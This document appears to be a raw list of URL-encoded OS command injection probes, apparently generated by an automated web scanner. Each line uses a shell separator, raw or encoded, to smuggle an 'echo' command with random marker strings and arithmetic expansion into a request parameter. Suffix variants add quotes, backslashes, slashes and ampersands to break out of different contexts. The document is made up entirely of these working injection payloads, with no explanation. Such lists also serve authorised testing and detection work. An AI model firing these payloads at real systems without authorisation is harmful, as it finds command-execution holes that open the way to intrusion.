+"%26echo%20HCCVWB$((30%2B94))$(echo%20HCCVWB)HCCVWB" +"%26%26echo%20GEOQBM$((28%2B12))$(echo%20GEOQBM)GEOQBM" +"%7Cecho%20FCZDSM$((68%2B91))$(echo%20FCZDSM)FCZDSM" +"%7C%7Cecho%20HTPEMJ$((2%2B19))$(echo%20HTPEMJ)HTPEMJ" +"echo%20OQTVEH$((73%2B9))$(echo%20OQTVEH)OQTVEH +"%20echo%20QIOHVO$((71%2B18))$(echo%20QIOHVO)QIOHVO +";echo%20HIENCF$((0%2B66))$(echo%20HIENCF)HIENCF +"&echo%20IBIYQC$((4%2B38))$(echo%20IBIYQC)IBIYQC +"|echo%20FOBRPZ$((91%2B99))$(echo%20FOBRPZ)FOBRPZ +"||echo%20KVIAFY$((17%2B57))$(echo%20KVIAFY)KVIAFY +"&&echo%20IQZTQY$((96%2B36))$(echo%20IQZTQY)IQZTQY +"%0aecho%20PNFTTQ$((20%2B65))$(echo%20PNFTTQ)PNFTTQ +"%3Becho%20PDMNTI$((23%2B51))$(echo%20PDMNTI)PDMNTI +"%26echo%20QKCGPP$((73%2B25))$(echo%20QKCGPP)QKCGPP +"%26%26echo%20IJQIDW$((5%2B53))$(echo%20IJQIDW)IJQIDW +"%7Cecho%20ZIYCEF$((9%2B56))$(echo%20ZIYCEF)ZIYCEF +"%7C%7Cecho%20OMOFYD$((86%2B53))$(echo%20OMOFYD)OMOFYD +"echo%20SRQCVS$((48%2B38))$(echo%20SRQCVS)SRQCVS// +"%20echo%20BYNNOQ$((5%2B9))$(echo%20BYNNOQ)BYNNOQ// +";echo%20OFZRPB$((30%2B95))$(echo%20OFZRPB)OFZRPB// +"&echo%20QZCVQA$((19%2B81))$(echo%20QZCVQA)QZCVQA// +"|echo%20XLPJUH$((63%2B35))$(echo%20XLPJUH)XLPJUH// +"||echo%20GIRCRN$((15%2B16))$(echo%20GIRCRN)GIRCRN// +"&&echo%20KXEBPS$((55%2B92))$(echo%20KXEBPS)KXEBPS// +"%0aecho%20JCEFAY$((97%2B37))$(echo%20JCEFAY)JCEFAY// +"%3Becho%20MDSQTA$((24%2B10))$(echo%20MDSQTA)MDSQTA// +"%26echo%20AIKVYL$((27%2B44))$(echo%20AIKVYL)AIKVYL// +"%26%26echo%20YUQTKP$((71%2B23))$(echo%20YUQTKP)YUQTKP// +"%7Cecho%20GPGSXE$((20%2B85))$(echo%20GPGSXE)GPGSXE// +"%7C%7Cecho%20JDTYJX$((18%2B24))$(echo%20JDTYJX)JDTYJX// +"echo%20UWNJQE$((91%2B46))$(echo%20UWNJQE)UWNJQE\ +"%20echo%20TZZNSL$((92%2B66))$(echo%20TZZNSL)TZZNSL\ +";echo%20IJTGYU$((36%2B47))$(echo%20IJTGYU)IJTGYU\ +"&echo%20TRMPTD$((48%2B23))$(echo%20TRMPTD)TRMPTD\ +"|echo%20EEOGHF$((87%2B30))$(echo%20EEOGHF)EEOGHF\ +"||echo%20EXJSNR$((49%2B13))$(echo%20EXJSNR)EXJSNR\ +"&&echo%20PMIRHD$((95%2B94))$(echo%20PMIRHD)PMIRHD\ +"%0aecho%20PZDPMF$((67%2B92))$(echo%20PZDPMF)PZDPMF\ +"%3Becho%20OFKRSW$((4%2B25))$(echo%20OFKRSW)OFKRSW\ +"%26echo%20MBGKIN$((22%2B60))$(echo%20MBGKIN)MBGKIN\ +"%26%26echo%20FGFIOR$((55%2B25))$(echo%20FGFIOR)FGFIOR\ +"%7Cecho%20XTLLDX$((25%2B20))$(echo%20XTLLDX)XTLLDX\ +"%7C%7Cecho%20HKHVFC$((85%2B7))$(echo%20HKHVFC)HKHVFC\ +"echo%20TPIIXD$((67%2B79))$(echo%20TPIIXD)TPIIXD& +"%20echo%20FEKBSB$((80%2B66))$(echo%20FEKBSB)FEKBSB& +";echo%20DNJXZB$((38%2B82))$(echo%20DNJXZB)DNJXZB& +"&echo%20JNXUVW$((81%2B20))$(echo%20JNXUVW)JNXUVW& +"|echo%20BKRUJQ$((5%2B96))$(echo%20BKRUJQ)BKRUJQ& +"||echo%20TNFYTM$((72%2B96))$(echo%20TNFYTM)TNFYTM& +"&&echo%20AEAXJF$((73%2B78))$(echo%20AEAXJF)AEAXJF& +"%0aecho%20DDWDPN$((91%2B29))$(echo%20DDWDPN)DDWDPN& +"%3Becho%20UZGZPC$((74%2B69))$(echo%20UZGZPC)UZGZPC& +"%26echo%20CXIGLR$((26%2B78))$(echo%20CXIGLR)CXIGLR& +"%26%26echo%20EXRBWP$((2%2B65))$(echo%20EXRBWP)EXRBWP& +"%7Cecho%20ZOFKJO$((5%2B82))$(echo%20ZOFKJO)ZOFKJO& +"%7C%7Cecho%20CTTIVX$((65%2B14))$(echo%20CTTIVX)CTTIVX& +"echo%20NMPYVC$((95%2B49))$(echo%20NMPYVC)NMPYVC| +"%20echo%20CTFTCJ$((80%2B91))$(echo%20CTFTCJ)CTFTCJ| +";echo%20QBISFH$((85%2B18))$(echo%20QBISFH)QBISFH| +"&echo%20CCWSNS$((52%2B72))$(echo%20CCWSNS)CCWSNS| +"|echo%20IIWZTV$((37%2B92))$(echo%20IIWZTV)IIWZTV| +"||echo%20DKOIIU$((52%2B39))$(echo%20DKOIIU)DKOIIU| +"&&echo%20ELGGDQ$((2%2B5))$(echo%20ELGGDQ)ELGGDQ| +"%0aecho%20QBFOYY$((28%2B31))$(echo%20QBFOYY)QBFOYY| +"%3Becho%20QATQCM$((57%2B7))$(echo%20QATQCM)QATQCM| +"%26echo%20XKUYPF$((60%2B61))$(echo%20XKUYPF)XKUYPF| +"%26%26echo%20DBNQDD$((96%2B50))$(echo%20DBNQDD)DBNQDD| +"%7Cecho%20BAERUM$((15%2B78))$(echo%20BAERUM)BAERUM| +"%7C%7Cecho%20FFARMZ$((95%2B61))$(echo%20FFARMZ)FFARMZ| +"echo%20MJEJVE$((54%2B9))$(echo%20MJEJVE)MJEJVE%27 +"%20echo%20LRNMXI$((82%2B72))$(echo%20LRNMXI)LRNMXI%27 +";echo%20QNIOIG$((45%2B76))$(echo%20QNIOIG)QNIOIG%27 +"&echo%20TFMDGN$((33%2B82))$(echo%20TFMDGN)TFMDGN%27 +"|echo%20CCTRQP$((48%2B16))$(echo%20CCTRQP)CCTRQP%27 +"||echo%20SAHVEF$((53%2B99))$(echo%20SAHVEF)SAHVEF%27 +"&&echo%20SKQWDW$((71%2B38))$(echo%20SKQWDW)SKQWDW%27 +"%0aecho%20LFVTXU$((70%2B65))$(echo%20LFVTXU)LFVTXU%27 +"%3Becho%20KRGULU$((96%2B71))$(echo%20KRGULU)KRGULU%27 +"%26echo%20WHBQCR$((5%2B15))$(echo%20WHBQCR)WHBQCR%27 +"%26%26echo%20NUMBRK$((29%2B87))$(echo%20NUMBRK)NUMBRK%27 +"%7Cecho%20NGISBI$((50%2B27))$(echo%20NGISBI)NGISBI%27 +"%7C%7Cecho%20OESDWI$((60%2B61))$(echo%20OESDWI)OESDWI%27 +"echo%20XFGDCC$((53%2B64))$(echo%20XFGDCC)XFGDCC%22 +"%20echo%20BZQFLS$((30%2B41))$(echo%20BZQFLS)BZQFLS%22 +";echo%20KGVZYK$((88%2B50))$(echo%20KGVZYK)KGVZYK%22 +"&echo%20ILAWBP$((7%2B21))$(echo%20ILAWBP)ILAWBP%22 +"|echo%20LYYMLJ$((68%2B90))$(echo%20LYYMLJ)LYYMLJ%22 +"||echo%20RJZLGG$((1%2B14))$(echo%20RJZLGG)RJZLGG%22 +"&&echo%20IWMDND$((49%2B2))$(echo%20IWMDND)IWMDND%22 +"%0aecho%20ZRDUWP$((33%2B75))$(echo%20ZRDUWP)ZRDUWP%22 +"%3Becho%20MMYKAT$((11%2B87))$(echo%20MMYKAT)MMYKAT%22 +"%26echo%20YWVNNT$((69%2B85))$(echo%20YWVNNT)YWVNNT%22 +"%26%26echo%20HNBMVY$((5%2B65))$(echo%20HNBMVY)HNBMVY%22 +"%7Cecho%20WYANEK$((66%2B6))$(echo%20WYANEK)WYANEK%22 +"%7C%7Cecho%20NVZIAZ$((98%2B45))$(echo%20NVZIAZ)NVZIAZ%22 +"echo%20VTSNKY$((47%2B67))$(echo%20VTSNKY)VTSNKY%5C%5C +"%20echo%20KTLVZA$((31%2B12))$(echo%20KTLVZA)KTLVZA%5C%5C +";echo%20LWIARI$((77%2B11))$(echo%20LWIARI)LWIARI%5C%5C +"&echo%20YMCHJB$((38%2B99))$(echo%20YMCHJB)YMCHJB%5C%5C +"|echo%20DDRLVR$((41%2B36))$(echo%20DDRLVR)DDRLVR%5C%5C +"||echo%20OMAHVH$((14%2B99))$(echo%20OMAHVH)OMAHVH%5C%5C +"&&echo%20PISJQQ$((33%2B72))$(echo%20PISJQQ)PISJQQ%5C%5C +"%0aecho%20SUQJYA$((1%2B59))$(echo%20SUQJYA)SUQJYA%5C%5C +"%3Becho%20WADYUK$((6%2B43))$(echo%20WADYUK)WADYUK%5C%5C +"%26echo%20TGSMRI$((56%2B34))$(echo%20TGSMRI)TGSMRI%5C%5C +"%26%26echo%20FFNJFE$((44%2B38))$(echo%20FFNJFE)FFNJFE%5C%5C +"%7Cecho%20QAFEAV$((75%2B66))$(echo%20QAFEAV)QAFEAV%5C%5C +"%7C%7Cecho%20PHPVAS$((47%2B19))$(echo%20PHPVAS)PHPVAS%5C%5C +"echo%20EPDILQ$((5%2B61))$(echo%20EPDILQ)EPDILQ%2F%2F +"%20echo%20KGLFRE$((0%2B31))$(echo%20KGLFRE)KGLFRE%2F%2F +";echo%20EXOUDI$((91%2B14))$(echo%20EXOUDI)EXOUDI%2F%2F +"&echo%20MTBNOE$((46%2B26))$(echo%20MTBNOE)MTBNOE%2F%2F +"|echo%20CPTRGO$((21%2B79))$(echo%20CPTRGO)CPTRGO%2F%2F +"||echo%20QDYNED$((79%2B86))$(echo%20QDYNED)QDYNED%2F%2F +"&&echo%20NMVRBB$((60%2B26))$(echo%20NMVRBB)NMVRBB%2F%2F +"%0aecho%20BGHKOM$((19%2B31))$(echo%20BGHKOM)BGHKOM%2F%2F +"%3Becho%20NQDGAY$((73%2B33))$(echo%20NQDGAY)NQDGAY%2F%2F +"%26echo%20QSDXQR$((21%2B3))$(echo%20QSDXQR)QSDXQR%2F%2F +"%26%26echo%20KAOPJJ$((97%2B96))$(echo%20KAOPJJ)KAOPJJ%2F%2F +"%7Cecho%20FXXYAL$((38%2B83))$(echo%20FXXYAL)FXXYAL%2F%2F +"%7C%7Cecho%20UBEZEA$((22%2B25))$(echo%20UBEZEA)UBEZEA%2F%2F +"echo%20WXRSMM$((62%2B81))$(echo%20WXRSMM)WXRSMM%26 +"%20echo%20OQFTMT$((91%2B48))$(echo%20OQFTMT)OQFTMT%26 +";echo%20KLODWM$((81%2B43))$(echo%20KLODWM)KLODWM%26 +"&echo%20LHBNPU$((26%2B5))$(echo%20LHBNPU)LHBNPU%26 +"|echo%20GLNWTR$((75%2B96))$(echo%20GLNWTR)GLNWTR%26 +"||echo%20GRZSSH$((83%2B88))$(echo%20GRZSSH)GRZSSH%26 +"&&echo%20FLLKBG$((76%2B53))$(echo%20FLLKBG)FLLKBG%26 +"%0aecho%20QBALEF$((39%2B26))$(echo%20QBALEF)QBALEF%26 +"%3Becho%20WVYDHU$((64%2B10))$(echo%20WVYDHU)WVYDHU%26 +"%26echo%20YKYSMI$((14%2B15))$(echo%20YKYSMI)YKYSMI%26 +"%26%26echo%20TZMDSB$((68%2B98))$(echo%20TZMDSB)TZMDSB%26 +"%7Cecho%20JUMRWV$((18%2B92))$(echo%20JUMRWV)JUMRWV%26 +"%7C%7Cecho%20NLZITW$((11%2B41))$(echo%20NLZITW)NLZITW%26 +"echo%20BNHMPM$((4%2B77))$(echo%20BNHMPM)BNHMPM%7C +"%20echo%20TZKEKG$((48%2B96))$(echo%20TZKEKG)TZKEKG%7C +";echo%20IBQUEF$((98%2B95))$(echo%20IBQUEF)IBQUEF%7C +"&echo%20EHEGZM$((64%2B33))$(echo%20EHEGZM)EHEGZM%7C +"|echo%20XTNGGL$((91%2B22))$(echo%20XTNGGL)XTNGGL%7C +"||echo%20OHBDBS$((38%2B62))$(echo%20OHBDBS)OHBDBS%7C +"&&echo%20IOUKTY$((23%2B26))$(echo%20IOUKTY)IOUKTY%7C +"%0aecho%20JLXCCQ$((76%2B40))$(echo%20JLXCCQ)JLXCCQ%7C +"%3Becho%20WRYICW$((92%2B9))$(echo%20WRYICW)WRYICW%7C +"%26echo%20LNTOCN$((59%2B67))$(echo%20LNTOCN)LNTOCN%7C +"%26%26echo%20WSLHMV$((15%2B92))$(echo%20WSLHMV)WSLHMV%7C +"%7Cecho%20ICAVIW$((19%2B96))$(echo%20ICAVIW)ICAVIW%7C +"%7C%7Cecho%20TSQXVM$((77%2B52))$(echo%20TSQXVM)TSQXVM%7C +|echo%20XHGLDQ$((49%2B17))$(echo%20XHGLDQ)XHGLDQ +|%20echo%20USBVMG$((4%2B90))$(echo%20USBVMG)USBVMG +;echo%20ESBMYC$((3%2B57))$(echo%20ESBMYC)ESBMYC +&echo%20DPXLYV$((75%2B2))$(echo%20DPXLYV)DPXLYV +|echo%20WKXARD$((95%2B10))$(echo%20WKXARD)WKXARD +||echo%20QQNXUE$((73%2B58))$(echo%20QQNXUE)QQNXUE +&&echo%20WMETWL$((1%2B53))$(echo%20WMETWL)WMETWL +%0aecho%20VFMAJZ$((49%2B82))$(echo%20VFMAJZ)VFMAJZ +%3Becho%20EFMVRM$((22%2B51))$(echo%20EFMVRM)EFMVRM +%26echo%20CFQNOE$((61%2B46))$(echo%20CFQNOE)CFQNOE +%26%26echo%20DTVUWP$((97%2B67))$(echo%20DTVUWP)DTVUWP +%7Cecho%20NIEMKE$((13%2B11))$(echo%20NIEMKE)NIEMKE +%7C%7Cecho%20KTTKHD$((67%2B44))$(echo%20KTTKHD)KTTKHD +echo%20KBEMAI$((13%2B27))$(echo%20KBEMAI)KBEMAI' +%20echo%20PQVHOY$((31%2B46))$(echo%20PQVHOY)PQVHOY' +;echo%20CUJAIZ$((32%2B35))$(echo%20CUJAIZ)CUJAIZ' +&echo%20PLNWCY$((48%2B70))$(echo%20PLNWCY)PLNWCY' +|echo%20FHWWQB$((42%2B27))$(echo%20FHWWQB)FHWWQB' +||echo%20ZSEPNF$((89%2B60))$(echo%20ZSEPNF)ZSEPNF' +&&echo%20ZVYTEU$((90%2B87))$(echo%20ZVYTEU)ZVYTEU' +%0aecho%20RWVTYR$((38%2B86))$(echo%20RWVTYR)RWVTYR' +%3Becho%20PDWIBS$((76%2B7))$(echo%20PDWIBS)PDWIBS' +%26echo%20VDRXRP$((8%2B96))$(echo%20VDRXRP)VDRXRP' +%26%26echo%20KOBQCV$((27%2B2))$(echo%20KOBQCV)KOBQCV' +%7Cecho%20UZKGGW$((60%2B30))$(echo%20UZKGGW)UZKGGW' +%7C%7Cecho%20HVEVCZ$((20%2B29))$(echo%20HVEVCZ)HVEVCZ' +echo%20NRCXSS$((87%2B18))$(echo%20NRCXSS)NRCXSS" +%20echo%20RPDFEQ$((68%2B74))$(echo%20RPDFEQ)RPDFEQ" +;echo%20VFFQVI$((85%2B47))$(echo%20VFFQVI)VFFQVI" +&echo%20CUKTGK$((2%2B61))$(echo%20CUKTGK)CUKTGK" +|echo%20WJNDLY$((76%2B22))$(echo%20WJNDLY)WJNDLY" +||echo%20YZMMII$((39%2B60))$(echo%20YZMMII)YZMMII" +&&echo%20ARDPUW$((94%2B28))$(echo%20ARDPUW)ARDPUW" +%0aecho%20UNXWMT$((40%2B95))$(echo%20UNXWMT)UNXWMT" +%3Becho%20NAPRQZ$((30%2B63))$(echo%20NAPRQZ)NAPRQZ" +%26echo%20UCMRWH$((43%2B12))$(echo%20UCMRWH)UCMRWH" +%26%26echo%20WXDFTC$((82%2B43))$(echo%20WXDFTC)WXDFTC" +%7Cecho%20WEFNXM$((36%2B97))$(echo%20WEFNXM)WEFNXM" +%7C%7Cecho%20FCVZMK$((81%2B22))$(echo%20FCVZMK)FCVZMK" +echo%20OQDPSL$((47%2B24))$(echo%20OQDPSL)OQDPSL +%20echo%20SILUZP$((90%2B7))$(echo%20SILUZP)SILUZP +;echo%20ROYDKA$((65%2B12))$(echo%20ROYDKA)ROYDKA +&echo%20FGFXYB$((41%2B62))$(echo%20FGFXYB)FGFXYB +|echo%20TTDDZC$((95%2B92))$(echo%20TTDDZC)TTDDZC +||echo%20VXNNZC$((25%2B32))$(echo%20VXNNZC)VXNNZC +&&echo%20TQHCUN$((6%2B71))$(echo%20TQHCUN)TQHCUN +%0aecho%20LLPOAO$((93%2B93))$(echo%20LLPOAO)LLPOAO +%3Becho%20QPNMNQ$((33%2B62))$(echo%20QPNMNQ)QPNMNQ +%26echo%20BCONMT$((21%2B78))$(echo%20BCONMT)BCONMT +%26%26echo%20HRLRGU$((89%2B5))$(echo%20HRLRGU)HRLRGU +%7Cecho%20MSOAVP$((20%2B27))$(echo%20MSOAVP)MSOAVP +%7C%7Cecho%20NYSCWX$((31%2B90))$(echo%20NYSCWX)NYSCWX +echo%20GCITOP$((61%2B30))$(echo%20GCITOP)GCITOP// +%20echo%20FKCLCN$((17%2B95))$(echo%20FKCLCN)FKCLCN// +;echo%20RAOGCR$((98%2B45))$(echo%20RAOGCR)RAOGCR// +&echo%20NLPFSA$((24%2B13))$(echo%20NLPFSA)NLPFSA// +|echo%20UTOZMO$((44%2B11))$(echo%20UTOZMO)UTOZMO// +||echo%20XYTCPC$((29%2B30))$(echo%20XYTCPC)XYTCPC// +&&echo%20NCEXJG$((72%2B12))$(echo%20NCEXJG)NCEXJG// +%0aecho%20XSPTNK$((94%2B10))$(echo%20XSPTNK)XSPTNK// +%3Becho%20RQIPKI$((2%2B84))$(echo%20RQIPKI)RQIPKI// +%26echo%20NCDDER$((2%2B81))$(echo%20NCDDER)NCDDER// +%26%26echo%20KPDDNO$((99%2B75))$(echo%20KPDDNO)KPDDNO// +%7Cecho%20MSSIPE$((43%2B93))$(echo%20MSSIPE)MSSIPE// +%7C%7Cecho%20ZZFTJX$((6%2B69))$(echo%20ZZFTJX)ZZFTJX// +echo%20SPARDK$((38%2B33))$(echo%20SPARDK)SPARDK\ +%20echo%20WIJKEI$((0%2B41))$(echo%20WIJKEI)WIJKEI\ +;echo%20DQKPUN$((89%2B48))$(echo%20DQKPUN)DQKPUN\ +&echo%20FQACTW$((22%2B3))$(echo%20FQACTW)FQACTW\ +|echo%20CAUDBF$((21%2B9))$(echo%20CAUDBF)CAUDBF\ +||echo%20ERSZFY$((55%2B21))$(echo%20ERSZFY)ERSZFY\ +&&echo%20JLZBTB$((60%2B18))$(echo%20JLZBTB)JLZBTB\ +%0aecho%20YZOZQS$((66%2B37))$(echo%20YZOZQS)YZOZQS\ +%3Becho%20FREAIO$((83%2B11))$(echo%20FREAIO)FREAIO\ +%26echo%20XMWQUR$((78%2B32))$(echo%20XMWQUR)XMWQUR\ +%26%26echo%20CQZWFA$((30%2B41))$(echo%20CQZWFA)CQZWFA\ +%7Cecho%20SBQEFZ$((80%2B12))$(echo%20SBQEFZ)SBQEFZ\ +%7C%7Cecho%20MMJATU$((39%2B34))$(echo%20MMJATU)MMJATU\ +echo%20PZDGKF$((44%2B50))$(echo%20PZDGKF)PZDGKF& +%20echo%20GRYEIF$((54%2B91))$(echo%20GRYEIF)GRYEIF& +;echo%20KTOGAF$((50%2B40))$(echo%20KTOGAF)KTOGAF& +&echo%20ANYKUW$((28%2B42))$(echo%20ANYKUW)ANYKUW& +|echo%20NDQGOQ$((5%2B63))$(echo%20NDQGOQ)NDQGOQ& +||echo%20ZQDJTK$((80%2B61))$(echo%20ZQDJTK)ZQDJTK& +&&echo%20EFKXWC$((29%2B48))$(echo%20EFKXWC)EFKXWC& +%0aecho%20OJUIJZ$((60%2B38))$(echo%20OJUIJZ)OJUIJZ& +%3Becho%20HGJGSA$((25%2B26))$(echo%20HGJGSA)HGJGSA& +%26echo%20DFYQEU$((76%2B77))$(echo%20DFYQEU)DFYQEU& +%26%26echo%20ZCRZFW$((63%2B13))$(echo%20ZCRZFW)ZCRZFW& +%7Cecho%20PSOVYF$((34%2B8))$(echo%20PSOVYF)PSOVYF& +%7C%7Cecho%20GFQYZE$((23%2B31))$(echo%20GFQYZE)GFQYZE& +echo%20TBRADG$((53%2B31))$(echo%20TBRADG)TBRADG| +%20echo%20PBUFFX$((8%2B76))$(echo%20PBUFFX)PBUFFX| +;echo%20UKUZES$((38%2B87))$(echo%20UKUZES)UKUZES| +&echo%20QVKVEF$((65%2B70))$(echo%20QVKVEF)QVKVEF| +|echo%20QAVNFZ$((68%2B13))$(echo%20QAVNFZ)QAVNFZ| +||echo%20QUULXG$((42%2B65))$(echo%20QUULXG)QUULXG| +&&echo%20ECAYHK$((20%2B55))$(echo%20ECAYHK)ECAYHK| +%0aecho%20EZVLSY$((12%2B10))$(echo%20EZVLSY)EZVLSY| +%3Becho%20HFWMJZ$((75%2B92))$(echo%20HFWMJZ)HFWMJZ| +%26echo%20FRKJNT$((96%2B80))$(echo%20FRKJNT)FRKJNT| +%26%26echo%20LSCMRZ$((76%2B36))$(echo%20LSCMRZ)LSCMRZ| +%7Cecho%20HXHRTD$((13%2B48))$(echo%20HXHRTD)HXHRTD| +%7C%7Cecho%20NLRFUJ$((16%2B3))$(echo%20NLRFUJ)NLRFUJ| +echo%20DGPFLA$((83%2B1))$(echo%20DGPFLA)DGPFLA%27 +%20echo%20DCVFLD$((69%2B75))$(echo%20DCVFLD)DCVFLD%27 +;echo%20NHFBAI$((91%2B84))$(echo%20NHFBAI)NHFBAI%27 +&echo%20JOKPJU$((39%2B3))$(echo%20JOKPJU)JOKPJU%27 +|echo%20IQEMUQ$((97%2B10))$(echo%20IQEMUQ)IQEMUQ%27 +||echo%20BTEWHM$((5%2B57))$(echo%20BTEWHM)BTEWHM%27 +&&echo%20MNUDNV$((12%2B9))$(echo%20MNUDNV)MNUDNV%27 +%0aecho%20SATWYE$((53%2B54))$(echo%20SATWYE)SATWYE%27 +%3Becho%20SETBTR$((9%2B96))$(echo%20SETBTR)SETBTR%27 +%26echo%20KNBVGS$((2%2B62))$(echo%20KNBVGS)KNBVGS%27 +%26%26echo%20KJZRGW$((6%2B53))$(echo%20KJZRGW)KJZRGW%27 +%7Cecho%20WTZBYV$((78%2B41))$(echo%20WTZBYV)WTZBYV%27 +%7C%7Cecho%20MUPATQ$((93%2B5))$(echo%20MUPATQ)MUPATQ%27 +echo%20FJUZMD$((40%2B24))$(echo%20FJUZMD)FJUZMD%22 +%20echo%20GTGFVS$((86%2B52))$(echo%20GTGFVS)GTGFVS%22 +;echo%20SXGZIM$((69%2B52))$(echo%20SXGZIM)SXGZIM%22 +&echo%20HJRGTK$((97%2B88))$(echo%20HJRGTK)HJRGTK%22 +|echo%20DWSCBS$((75%2B48))$(echo%20DWSCBS)DWSCBS%22 +||echo%20OVDJWG$((12%2B73))$(echo%20OVDJWG)OVDJWG%22 +&&echo%20QDULCS$((14%2B19))$(echo%20QDULCS)QDULCS%22 +%0aecho%20FBTRKX$((12%2B17))$(echo%20FBTRKX)FBTRKX%22 +%3Becho%20UZVXVR$((66%2B82))$(echo%20UZVXVR)UZVXVR%22 +%26echo%20MHDYGG$((49%2B88))$(echo%20MHDYGG)MHDYGG%22 +%26%26echo%20ZOUFKS$((71%2B23))$(echo%20ZOUFKS)ZOUFKS%22 +%7Cecho%20VKLXSK$((91%2B24))$(echo%20VKLXSK)VKLXSK%22 +%7C%7Cecho%20DQMLLV$((10%2B50))$(echo%20DQMLLV)DQMLLV%22 +echo%20DAPXMM$((19%2B99))$(echo%20DAPXMM)DAPXMM%5C%5C +%20echo%20YPJVNC$((48%2B74))$(echo%20YPJVNC)YPJVNC%5C%5C +;echo%20HUWTGD$((19%2B3))$(echo%20HUWTGD)HUWTGD%5C%5C +&echo%20LDMWNX$((39%2B93))$(echo%20LDMWNX)LDMWNX%5C%5C +|echo%20WAXRWD$((80%2B57))$(echo%20WAXRWD)WAXRWD%5C%5C +||echo%20JFXLVC$((83%2B84))$(echo%20JFXLVC)JFXLVC%5C%5C +&&echo%20RCCBBV$((37%2B98))$(echo%20RCCBBV)RCCBBV%5C%5C +%0aecho%20ZWEWEE$((81%2B57))$(echo%20ZWEWEE)ZWEWEE%5C%5C +%3Becho%20ISFWLN$((61%2B53))$(echo%20ISFWLN)ISFWLN%5C%5C +%26echo%20DFIOYS$((27%2B56))$(echo%20DFIOYS)DFIOYS%5C%5C +%26%26echo%20JRNAMJ$((68%2B44))$(echo%20JRNAMJ)JRNAMJ%5C%5C +%7Cecho%20YUWHXN$((65%2B16))$(echo%20YUWHXN)YUWHXN%5C%5C +%7C%7Cecho%20JCLZPJ$((70%2B40))$(echo%20JCLZPJ)JCLZPJ%5C%5C +echo%20FVWBKZ$((56%2B38))$(echo%20FVWBKZ)FVWBKZ%2F%2F +%20echo%20WRSAKG$((59%2B68))$(echo%20WRSAKG)WRSAKG%2F%2F +;echo%20FFDHYG$((63%2B20))$(echo%20FFDHYG)FFDHYG%2F%2F +&echo%20JBPWLJ$((57%2B13))$(echo%20JBPWLJ)JBPWLJ%2F%2F +|echo%20FUUFIA$((12%2B61))$(echo%20FUUFIA)FUUFIA%2F%2F +||echo%20HGLIQL$((80%2B19))$(echo%20HGLIQL)HGLIQL%2F%2F +&&echo%20HMERTY$((95%2B54))$(echo%20HMERTY)HMERTY%2F%2F +%0aecho%20HLIPMG$((9%2B10))$(echo%20HLIPMG)HLIPMG%2F%2F +%3Becho%20WZQZMU$((55%2B24))$(echo%20WZQZMU)WZQZMU%2F%2F +%26echo%20PAEWVB$((55%2B53))$(echo%20PAEWVB)PAEWVB%2F%2F +%26%26echo%20PILBFC$((9%2B73))$(echo%20PILBFC)PILBFC%2F%2F +%7Cecho%20HEMYTZ$((83%2B92))$(echo%20HEMYTZ)HEMYTZ%2F%2F +%7C%7Cecho%20TERRZN$((57%2B89))$(echo%20TERRZN)TERRZN%2F%2F +echo%20YMGFHG$((56%2B20))$(echo%20YMGFHG)YMGFHG%26 +%20echo%20KACUJG$((17%2B57))$(echo%20KACUJG)KACUJG%26 +;echo%20JYXFUS$((22%2B98))$(echo%20JYXFUS)JYXFUS%26 +&echo%20ZMZTLJ$((97%2B61))$(echo%20ZMZTLJ)ZMZTLJ%26 +|echo%20MRVYMS$((85%2B67))$(echo%20MRVYMS)MRVYMS%26 +||echo%20CZQCUH$((88%2B14))$(echo%20CZQCUH)CZQCUH%26 +&&echo%20LDERRF$((18%2B3))$(echo%20LDERRF)LDERRF%26 +%0aecho%20BLBAVR$((79%2B49))$(echo%20BLBAVR)BLBAVR%26 +%3Becho%20BKDTSI$((78%2B91))$(echo%20BKDTSI)BKDTSI%26 +%26echo%20OGAQAD$((97%2B22))$(echo%20OGAQAD)OGAQAD%26 +%26%26echo%20BBBUFB$((63%2B41))$(echo%20BBBUFB)BBBUFB%26 +%7Cecho%20KZQFJT$((26%2B74))$(echo%20KZQFJT)KZQFJT%26 +%7C%7Cecho%20OVBFOE$((46%2B36))$(echo%20OVBFOE)OVBFOE%26 +echo%20IXGYZZ$((51%2B23))$(echo%20IXGYZZ)IXGYZZ%7C +%20echo%20NYGDLL$((82%2B79))$(echo%20NYGDLL)NYGDLL%7C +;echo%20TDHCPF$((21%2B38))$(echo%20TDHCPF)TDHCPF%7C +&echo%20WTDJVU$((89%2B9))$(echo%20WTDJVU)WTDJVU%7C +|echo%20UKBANH$((70%2B33))$(echo%20UKBANH)UKBANH%7C +||echo%20UWJWIH$((97%2B96))$(echo%20UWJWIH)UWJWIH%7C +&&echo%20STFNSK$((89%2B70))$(echo%20STFNSK)STFNSK%7C +%0aecho%20FDJRHK$((66%2B94))$(echo%20FDJRHK)FDJRHK%7C +%3Becho%20DCWGLU$((82%2B36))$(echo%20DCWGLU)DCWGLU%7C +%26echo%20SJQERK$((87%2B3))$(echo%20SJQERK)SJQERK%7C +%26%26echo%20AWXHOA$((97%2B59))$(echo%20AWXHOA)AWXHOA%7C +%7Cecho%20VIYOLO$((54%2B86))$(echo%20VIYOLO)VIYOLO%7C +%7C%7Cecho%20YNEGDR$((66%2B88))$(echo%20YNEGDR)YNEGDR%7C +&echo%20CWKFHD$((44%2B85))$(echo%20CWKFHD)CWKFHD +&%20echo%20KETLTE$((63%2B93))$(echo%20KETLTE)KETLTE +;echo%20VMNDNS$((4%2B99))$(echo%20VMNDNS)VMNDNS +&echo%20SSAQOI$((4%2B7))$(echo%20SSAQOI)SSAQOI +|echo%20XUPXZX$((83%2B57))$(echo%20XUPXZX)XUPXZX +||echo%20NAEKVJ$((41%2B68))$(echo%20NAEKVJ)NAEKVJ +&&echo%20MPUVIU$((4%2B26))$(echo%20MPUVIU)MPUVIU +%0aecho%20FHNIBR$((51%2B94))$(echo%20FHNIBR)FHNIBR +%3Becho%20SSPZUQ$((62%2B73))$(echo%20SSPZUQ)SSPZUQ +%26echo%20DRFJEZ$((0%2B71))$(echo%20DRFJEZ)DRFJEZ +%26%26echo%20VYNOHQ$((96%2B30))$(echo%20VYNOHQ)VYNOHQ +%7Cecho%20KOAHWY$((4%2B67))$(echo%20KOAHWY)KOAHWY +%7C%7Cecho%20OBGZFK$((77%2B1))$(echo%20OBGZFK)OBGZFK +echo%20RFRFQM$((78%2B19))$(echo%20RFRFQM)RFRFQM' +%20echo%20OTWDTY$((69%2B66))$(echo%20OTWDTY)OTWDTY' +;echo%20PSMUSP$((33%2B35))$(echo%20PSMUSP)PSMUSP' +&echo%20MYJSKQ$((23%2B79))$(echo%20MYJSKQ)MYJSKQ' +|echo%20OKCZRM$((7%2B40))$(echo%20OKCZRM)OKCZRM' 